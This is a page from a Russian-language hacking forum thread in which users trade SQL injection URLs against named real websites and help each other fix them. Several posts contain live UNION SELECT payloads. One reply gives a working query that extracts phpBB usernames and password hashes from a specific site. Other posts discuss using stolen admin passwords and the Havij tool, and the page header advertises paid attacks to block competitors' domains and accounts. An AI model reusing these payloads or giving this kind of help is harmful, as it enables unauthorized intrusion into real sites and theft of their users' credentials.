Ваши вопросы по уязвимостям.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 2269 из 2438

2269

Опции темы

Поиск в этой теме

Опции просмотра

#22681

21.08.2013, 00:35

ishenko

Новичок

Регистрация: 18.08.2013

Сообщений: 3

С нами: 6702806

Репутация: 0

Приветствую всех.

При запросе site.ru:3306 скачивается файл а в нем версия мускуля

F 5.0.32-Debian_7etch5 нz J>8>m**0 ,ў! U:a\)VU*mg@F яBad handshake

настройки мускула неправильные?

дальше что нить можно с этим сделать?

есть пароли админов но при вводе они не проходят ...

проверка по айпи может?

или еще как нить блокирует ?

#22682

21.08.2013, 00:45

Inoms

Участник форума

Регистрация: 23.06.2013

Сообщений: 103

С нами: 6783446

Репутация: 45

Цитата:

Сообщение от ishenko

есть пароли админов но при вводе они не проходят ...
проверка по айпи может?
или еще как нить блокирует ?

Привязка пользователя к конкретному хосту вполне может быть, или там у каждого пользователя хост равен localhost. Если там нет phpmyadmin'a, или ему подобному, подключиться удаленно не получится.

#22683

21.08.2013, 12:45

Unknowhacker

Участник форума

Регистрация: 25.05.2013

Сообщений: 249

С нами: 6825206

Репутация: 24

Я уже задолбался подбирать столбцы

Код:

http://www.smz.donetsk.ua/index.php?id=2782&show=news&newsid=-108450%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+--+

http://www.cigarettehouse.net/?action=page&name=NEWS&page=-37+and+1=1+union+select+231,223+--+

http://www.ntvplus.ru/channels/channel.xl?id=45409%27

народ, скажите что не так

#22684

21.08.2013, 22:29

Ravenous

Участник форума

Регистрация: 14.07.2012

Сообщений: 115

С нами: 7278806

Репутация: 26

Цитата:

Сообщение от Unknowhacker

Я уже задолбался подбирать столбцы

Код:

http://www.smz.donetsk.ua/index.php?id=2782&show=news&newsid=-108450%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+--+

http://www.cigarettehouse.net/?action=page&name=NEWS&page=-37+and+1=1+union+select+231,223+--+

http://www.ntvplus.ru/channels/channel.xl?id=45409%27

народ, скажите что не так

SQL-injection Полный faq от Dr.Zero. Пункт "подбор столбцов"

http://www.smz.do[lalala]netsk.ua/index.php?id=2782&show=news&newsid=108450 order by 3 -- 1

#22685

22.08.2013, 12:44

Unknowhacker

Участник форума

Регистрация: 25.05.2013

Сообщений: 249

С нами: 6825206

Репутация: 24

Цитата:

Сообщение от Ravenous

SQL-injection Полный faq от Dr.Zero. Пункт "подбор столбцов"
http://www.smz.do[lalala]netsk.ua/index.php?id=2782&show=news&newsid=108450 order by 3 -- 1

Разочарование при вводе version() - I don't like you...

#22686

22.08.2013, 13:12

trololoman96

Участник форума

Регистрация: 01.12.2011

Сообщений: 120

С нами: 7604246

Репутация: 55

хакир ну и чо ? то что фильт на version() это еще ничего не значит, самое главное то нормально выводится. и саму версию бд можно вывести так @@version

#22687

23.08.2013, 11:55

danil7493

Новичок

Регистрация: 24.07.2011

Сообщений: 23

С нами: 7791446

Репутация: 10

Скажите что не так?

http://www._____.com/news.php?newsid=-397+union+select+1,2,concat_ws(0x3a,username,passw ord),4,5,6,7,8,9+from+phpbb_users

Пишет Query failed: Table 'trunovc7_loy.phpbb_users' doesn't exist нет таблицы

5.0.92-log:trunovc7_tr@localhost:trunovc7_loy

#22688

23.08.2013, 14:28

migjee

Новичок

Регистрация: 13.06.2008

Сообщений: 1

С нами: 9426113

Репутация: 0

Нашел единственную уязвимость на сайте.Начал анализ

Нашел мне такую базу данных, в хавидж жму Get tables внутри ничего не вылезает, вот название Current DB: }NLrxf}x{f} ffw иероглифы какие то и скобки.Скажите что делать?

#22689

23.08.2013, 14:52

RedX

Познающий

Регистрация: 12.06.2008

Сообщений: 32

С нами: 9427499

Репутация: 22

Цитата:

Сообщение от danil7493

Скажите что не так?
http://www._____.com/news.php?newsid=-397+union+select+1,2,concat_ws(0x3a,username,passw ord),4,5,6,7,8,9+from+phpbb_users
Пишет Query failed: Table 'trunovc7_loy.phpbb_users' doesn't exist нет таблицы
5.0.92-log:trunovc7_tr@localhost:trunovc7_loy

Код HTML:

http://www.trunov.com/news.php?newsid=-237+UNION+SELECT+1,CONCAT_ws(0x3a,username,user_password),3,4,5,6,7,8,9+FROM+trunovc7_forum.phpbb_users+LIMIT+1,1--&page=1

#22690

23.08.2013, 15:06

migjee

Новичок

Регистрация: 13.06.2008

Сообщений: 1

С нами: 9426113

Репутация: 0

Помогите пожалуйста сначало я вывел базу, она не открывалась.Теперь ничего не делается.Люди посоветуйте через Havij иньекцию делал

вот тут уязвимость

http://rp-gameworld.ru/index.php?c=registration&action=reg

Страница 2269 из 2438

2269

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Создать сделку

Мои сделки

Сделка